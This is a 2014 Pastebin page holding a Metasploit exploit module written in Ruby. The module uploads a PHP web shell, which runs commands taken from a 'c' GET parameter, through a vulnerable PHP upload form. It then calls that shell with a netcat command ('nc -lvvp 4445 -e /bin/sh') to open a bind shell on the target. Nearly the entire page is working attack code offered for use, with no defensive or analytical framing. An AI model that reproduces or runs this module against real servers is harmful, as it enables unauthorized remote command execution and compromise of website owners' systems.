API tools faq
paste
Advertisement
Guest User

super cool msf module

a guest
Dec 30th, 2014
630
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Ruby 2.51 KB | None | 0 0
raw download clone embed print report
  1.  
  2. ##
  3. # This module requires Metasploit: http//metasploit.com/download
  4. # Current source: https://github.com/rapid7/metasploit-framework
  5. ##
  6.  
  7. require 'msf/core'
  8.  
  9. class Metasploit3 < Msf::Exploit::Remote
  10.   Rank = ExcellentRanking
  11.  
  12.   include Msf::HTTP::Wordpress
  13.   include Msf::Exploit::FileDropper
  14.  
  15.   def initialize(info = {})
  16.     super(update_info(info,
  17.       'Name'           => 'Super cool shell upload',
  18.       'Description'    => %q{
  19.                 This is super cool module for Metasploit to check if you can upload shell on target.
  20.       },
  21.       'Author'         =>
  22.         [
  23.           'HauntIT Blog'     # metasploit module
  24.         ],
  25.       'License'        => MSF_LICENSE,
  26.       'References'     =>
  27.         [
  28.           [ 'URL', 'http://HauntIT.blogspot.com']
  29.         ],
  30.       'Privileged'     => false,
  31.       'Platform'       => ['php'],
  32.       'Arch'           => ARCH_PHP,
  33.       'Targets'        => [ ['Any vulnerable upload ', {}] ],
  34.       'DefaultTarget'  => 0,
  35.       'DisclosureDate' => '28/12/2014'))
  36.   end
  37.  
  38.  
  39.   def check
  40.     readurl = normalize_uri(target_uri.path, 'upload','upload.php')
  41.     res = send_request_cgi({
  42.       'uri'    => readurl,
  43.       'method' => 'GET'
  44.     })
  45.  
  46.     if res.code != 200
  47.       return Msf::Exploit::CheckCode::Unknown
  48.     end
  49.  
  50.     return Msf::Exploit::CheckCode::Safe
  51.   end
  52.  
  53.   def exploit
  54.     payload_name = "#{rand_text_alpha(10)}.php"
  55.  
  56.     shell = "<?php echo '<pre>';$c=$_GET['c'];shell_exec($c);?>"
  57.  
  58.     uri = normalize_uri(target_uri.path, 'upload','upload.php')
  59.  
  60.     data = Rex::MIME::Message.new
  61.     data.add_part(shell, 'application/octet-stream', 'binary', "form-data; name=\"plik\"; filename=\"#{payload_name}\"")
  62.  
  63.  
  64.     post_data = data.to_s
  65.  
  66.     payload_uri = normalize_uri(target_uri.path, 'upload','foto', payload_name)
  67.  
  68.     print_status("#{peer} - Uploading payload to #{payload_uri}")
  69.     res = send_request_cgi({
  70.       'method'   => 'POST',
  71.       'uri'      => uri,
  72.       'ctype'    => "multipart/form-data; boundary=#{data.bound}",
  73.       'vars_post' => { 'plik' => '#{payload_name}' },
  74.       'data'     => post_data
  75.     })
  76.  
  77.     if res.code != 200 || res.body =~ /Blad/
  78.       fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
  79.     else
  80.       print_status("Got shell ;>")
  81.     end
  82.  
  83.     print_status("#{peer} - Executing payload #{payload_uri}")
  84.     res = send_request_cgi({
  85.       'uri'    => payload_uri,
  86.       'method' => 'GET',
  87.       'vars_get' => {'c' => 'id;nc -lvvp 4445 -e /bin/sh &'}
  88.     })
  89.  
  90.  
  91.   end
  92. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!